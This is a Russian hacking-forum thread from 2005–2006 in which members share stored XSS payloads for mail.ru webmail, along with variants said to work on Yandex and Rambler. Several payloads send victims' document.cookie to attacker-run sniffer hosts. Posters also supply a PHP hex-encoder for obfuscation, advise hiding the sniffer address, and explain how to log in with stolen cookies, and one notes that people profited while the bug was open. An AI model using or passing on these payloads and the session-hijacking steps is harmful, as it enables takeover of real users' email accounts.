Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Активная XSS на mail.ru (https://forum.antichat.xyz/showthread.php?t=11318)

Dronga 04.12.2005 09:49

Активная XSS на mail.ru
 
Заранее прошу прощения у модераторов за дублирование темы, просто на мой взгляд в этом разделе следует выкладывать _готовые_ уязвимости, а не задавать вопросы по их поиску.

Антология XSS на mail.ru

Не знаю, может кому пригодится, но эволюция фильтра на mail.ru протекала следующим образом. На момент моей регистрации на античате перестала действовать фишка.
PHP код:

<image src=JaVaScRiPt:alert()> 

Все были очень удивлены :p Эта бага держалась очень долго...
Следущая ошибка была найдена мной, помог мне Майор, она работала под IE, а я тестил под Оперой) Майор проверил под IE, я ему сперва даже не поверил) Брался fail.txt, в нем в наглую прописывалось:
PHP код:

<script>alert()</script

и всё это дело переименовывалось в fail.jpg. Но эту филонку сравнительно быстро прекрыли...

Следующим шагом стал пост уже не помню кого... =) Если напомните, то будет хорошо) XSS проходила благодаря двойному кодированию в ASCII слова javascript. При этом этаже бага была одновременно актуальна и для yandex.ru =) Выглядело это так:
PHP код:

 <img src="http://server.com/picture.jpg" dynsrc="&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54:document.images[0].src='http://sniffer.com/sniff.php?cook='+document.cookie"

К сожалению, всё что ушло в большой паблик долго не живет =)

И тут снова Майор, умнейший человек) Я долго ругался когда он мне одному из первых поведал о собственном открытии) Всё было просто и изящно... Чтобы закрыть предыдущую багу, фильтр на Mail.ru стал до бесконечности раскодировать то что закодировано в ASCII... Тогда Майор половину слова javascript закодировал в ASCII и отдельно ещё раз зашифровал каждый символ &. А другую половину поставил через знак табуляции... И фильтр терялся... Выглядело это так:
PHP код:

<bgsound src="&#38#106&#38#97&#38#118&#38#97&#38#115&#38#99&#38#114    ipt:alert()" loop=5

Но и эта уязвимость будучи выложенной долго не продержалась. И вот эта тема коснулась меня) Всю ночь убил на поиски, эксперименты... Мозги уже не варят. XSS выглядит следующим образом:
PHP код:

<font color="green>"style="font-size:1px;background:url\(java/**/script:alert('XSS by Dronga'))"

Вот) Активная, в теле письма... Конечно она ещё сыровата, но общая конструкция видна. В таком виде работает вроде только под ИЕ, сколько не пытался под оперу заточить - бесполезно... Кто будет пробовать - советую поиграть с символами " и `. Что-то типа вот так: color=`green"style

Конечно, может кто-то что-то и покруче нашел, что для всех браузеров применимо, но что я нашел тем и поделился.

PS. Не забываем о приватности раздела и доверии друг другу.

byte57 04.12.2005 10:26

респект, проверим седня

grinay 04.12.2005 10:34

Молоток плюсик те:)

TANZWUT 04.12.2005 11:20

сейчас потестим:):):)

m0nzt3r 04.12.2005 11:49

ну вот=) в МОА только достойнейшие=)

qBiN 04.12.2005 11:52

Цитата:

Если напомните, то будет хорошо)
По мойму дело рук Майора, или ЛиттлЛамера что-то не припомню...
А плюс щас поставим...

kot777 04.12.2005 12:16

Странно, у меня не работает, последние скобки заменяются на подмигивающий смайл.
Добавлено:
Точно про разметку забыл, гост спасибо

byte57 04.12.2005 12:24

каким браузером тестил? хотя скорее всего ты разметку <html></html> не делал, да?

Dronga 04.12.2005 15:20

Ребята, всё работает, заходим в раздел E-mail->FAQ, скачиваем програмку XSSTester от LittleLamer, удаляем всё что там забито по дефолту и вставляем мой вариант, ничего не дописываем (никаких <html></html> не надо, их фильтр нещадно режет, вставляем одну единственную строчку - саму XSS). Забиваем информацию для отправки и отправляем. Идем проверяем, ещё раз напоминаю что актуально в таком виде только для IE (у меня IE6 SP2).

kot777 04.12.2005 15:49

Кто-нибудь сформировал запрос, уже со сниффером, просто у меня не получается правильную структуру сделать.

SanyaX 04.12.2005 15:51

Может что у меня sp1 один стоит поэтому косяки по идее нормально всё должно!

PinkPanther 05.12.2005 02:28

Dronga респект!!!

Цитата:

Сообщение от kot777
Кто-нибудь сформировал запрос, уже со сниффером, просто у меня не получается правильную структуру сделать.

Держи:
PHP код:

<font color="green>"style="font-size:1px;background:url\(java/**/script:document.images[0].src='http://privatesniff/s.jpg?'+document.cookie)"


SanyaX 05.12.2005 15:17

А я видео снял про XSS на yandex.ru смотрите в разделе видео.

PSalm69 05.12.2005 15:19

Цитата:

Сообщение от PinkPanther
Dronga респект!!!

Держи:
PHP код:

<font color="green>"style="font-size:1px;background:url\(java/**/script:document.images[0].src='http://privatesniff/s.jpg?'+document.cookie)"


Я ващет прячу под кодировкой свой снифф. Чего и всем советую. Меня так один раз вычислили когда указал свой снифф.
Пантер, стуканись плз в аську, дело есть.

byte57 05.12.2005 15:28

саняХ поди такая же бага? ;)
а вообще не поленись - напиши еще, мне вот видео влом качать...

SanyaX 05.12.2005 15:34

Нет не такая воще её просек морф просто в гипер ссылки java скрипты воще не фильтруются втавляешь туда простой запрос чтобы куки пиздит и всё. Прошу добавить мне репутации =))

byte57 05.12.2005 15:55

кстати бага дрона и на рамблере сработала!)

PSalm69 05.12.2005 15:58

Цитата:

Сообщение от SanyaX
Нет не такая воще её просек морф просто в гипер ссылки java скрипты воще не фильтруются втавляешь туда простой запрос чтобы куки пиздит и всё. Прошу добавить мне репутации =))

А какая? =)
Принцип один и тот же.

SanyaX 05.12.2005 15:58

Аха точно всё работает прикольно почти на всех почтовых службах можно сесию угнать прикольно!!!

SanyaX 05.12.2005 15:59

Цитата:

Сообщение от PSalm69
А какая? =)
Принцип один и тот же.

Что то я тебя не понял не много! Ты имеешь ввиду активная или пассивная. Активная там. Вообщем посмотри лучше видео.

PSalm69 05.12.2005 16:05

Цитата:

Сообщение от .::Gh0st::.
кстати бага дрона и на рамблере сработала!)

Скажу более... если ента тема протолкнётся дальше в одном из мыльников, то пипец ваще будет. Правда там с кодировкой надо поиграть. Ваще Дронга молодца! В копилке XSS на мыльниках от тебя (кажись и от МАЙОРа) +1

SanyaX 05.12.2005 16:10

Хех дронга XSS не работает на yandex'e так что прикольно что нашёл на яндексе. Блин я так старался видео сделать что мне не кто не что не добавят. А воще я так и предполагал что гринам,модерам,админам,Мем ерам. Не будет это интересно потому что они самые умные =))

byte57 05.12.2005 16:31

ахаха, джордан - гений, поставлю репу, если напишешь в форуме ну хотя б в этом разделе отдельный топик...

простейший hex-encoder:
PHP код:

<?
$str 
str_replace("%20"""$QUERY_STRING);
for (
$i=0$i<strlen($str); $i++)
     {
     
$hex=dechex(ord($str[$i]));
     if (
$str[$i]=='&') echo "$str[$i]";
     else if  (
$str[$i]!='\\') echo "%$hex";
     }
?>


censored! 05.12.2005 16:40

Вы своими XSS поломали оборудование на mail.ru =)))))))))))))
...
Цитата:

Ошибка
Уважаемый пользователь!
Вы вводите правильный пароль к почтовому ящику.
Открываемый Вами почтовый ящик в данный момент недоступен из-за сбоя в работе оборудования.
Нами ведутся аварийные восстановительные работы.
Пожалуйста, попробуйте повторить попытку входа в почтовый ящик через 3 часа.
Приносим извинения за доставленные неудобства.

dinar_007 05.12.2005 16:43

ЛОЛ )))
А какими прогами лучше отправлять письмо в ХТМЛ? Ато через веб интерфейс низя на мыл.ру (((

byte57 05.12.2005 16:45

XSS Tester неплохая прога - заюзай поиск по форуму...
+ а у меня нормально на мыло заходит... ну пока помучаем рамблер)

censored! 05.12.2005 16:48

Можешь с rambler.ru, можешь в ЗеБате (Параметры-Формат сообщения) или Оутлуке.
XSS Tester -> http://www.forum.antichat.ru/attachm...tachmentid=175

byte57 05.12.2005 17:47

вот на мэйл.ру залезть с кукой - все понятно: или CookieEditor или AccessDiver...

- на рамблере блин в куке всего 1 значение показывает CookieEditor (ruid), когда приходит где-то 5...
- через дайвер пробовал по рефереру зайти + кука - редиректит на rambler.ru

Dronga 21.02.2006 01:08

Спасибо всем за старания товарищи, бага не актуальна. Сегодня её прикрыли. Месяц она жила, думаю многие неплохо погрелись на этом. Можно конечно выложить ещё одну и я бы сделал это если бы тут умели хранить секреты. Пальцем ни в кого не тыкаю, но не очень приятно когда ко мне в асю стучатся левые люди и показывают мне мою же Xss... Делаем выводы господа. Всем ещё раз спасибо.

max_pain89 21.02.2006 16:00

Дронга, не отчаивайся друг. Все летает как по маслу! Админы mail.ru не такие умные люди. Щас катит всебраузеровый вариант:

PHP код:

<img/src='http://////>>>>>\&#+39 style='display:none;&#+39 onerror=confirm()> 

тестил только что, спасибо в репе, если я помог

Dronga 21.02.2006 17:24

Да помог то помог, только не мне, опять всё повторится... И помоему это не для всех браузеров, сейчас погляжу. Дело в img/src - эту конструкцию не все браузеры принимают, IE на ура, а вот остальные не примут вроде.

Elekt 15.07.2006 19:46

Решено спустить в общее.

Думаю, Всем будет интересно почитать историю лома mail.ru.

Кстати, данные ХSS работают на других менее "продвинутых" почтовиках :)
Удачных подвигов!

Помните, данная информация предназначена только для ознакомления. Мы не рекомендуем Вам испытывать данные XSS-эксплоиты.

Powered by Antichat.ru

Dronga 16.07.2006 02:21

Наконец-то в паблике =) Сколько шуму было из этой темы. Как раз на момент её создания alsa основал АМА (пожалуй, самый закрытый на сегодня раздел) и я был первым кто в него зашел и первым моим постом в абсолютно пустом разделе стала усовершенствованная XSS. Так хотелось приписать "Первый нах!", ну вы понимаете, момент ведь исторический.

На открытие опять-таки навел Майор, он уже всё обыграв в голове и поняв просто спросил, почему работает это:
Код HTML:

<font color="green>"style="font-size:1px;background:url\(java/**/script:alert('XSS by Dronga'))">
.... И меня осенило =) Вот так всё и получается.

Код HTML:

<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')>
Вот она работала под всеми браузерами, включая FF. Это была бомба к которой имели доступ всего 9 человек с форума =)

Фильтр терялся когда в атрибуте натыкался на закрывающий тег знак > и после него уже не смотрел.. А с точки зрения браузера всё что в кавычках - это атрибут. Поэтому генерилась ошибка и добавив обработчик onerror мы добивались своего =) Из МОА никто не догадался, хотя всё было у них перед глазами)

Пусть теперь все видят и знают что и как обсуждается в закрытых разделах. Ну и конечно стремятся туда. Кстати, из всего этого материала рукой подать до ещё одной активной XSS, но только под IE (Greetz to ZaCo =)

Удачи, господа)

Зверь 16.07.2006 13:33

<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')> ,подскажите пожалуйста,что надо вставлТь вместо xss ?

Dronga 16.07.2006 13:42

Вообще вот такая запись:
Код HTML:

<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')>
Это просто наглядно, а вариаций тут может быть куча, можете попробовать даже вот так:
Код HTML:

<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert(1)>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('2')>
<img src="http://img.mail.ru/mail/ru/images/dumb.gif        >"onerror=alert('3')>

Просто дело вашей фантазии.

Отвечаю на вопрос:
Код HTML:

<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=document.images[0].src="http://www.link.com/script_sniffer.php?cooki="+document.cookie;>
Что-то около того)

Зверь 16.07.2006 13:44

Огромное СПАСИБО!!!!

LeopardSS 27.07.2006 23:24

Честно говоря надоело через хсс, кто б че нового придумал гг

dikiismok 29.07.2006 06:40

.....
 
Не могу понять почему не срабатывает...


Код HTML:

<img src=\"xss\" width=0 height=0 style=\"top:expression(eval(this.sas));\" width=0 height=0 sas=\"this.src=\'xss\' document.cookie;this.sas=null\" alt=\'\'>
Вот этот код после майловского фильтра...
Код HTML:

<img src=\"xss\" width=0 height=0  xstyle=\"top:expression(eval(this.sas));\" width=0 height=0  sas=\"this.src=\"xss\" document.cookie;this.sas=null\" alt=\"\">

Dronga 01.08.2006 20:17

А ты не заметил, что style отфильтровался и стал xstyle?? Поэтому и не работает.

AMbar 02.08.2006 00:57

Не пойму, но как это все провети? не пойму отправляю письмо в вижео хтмл с кодом? обоснуйте по полочкам, плз


Время: 05:47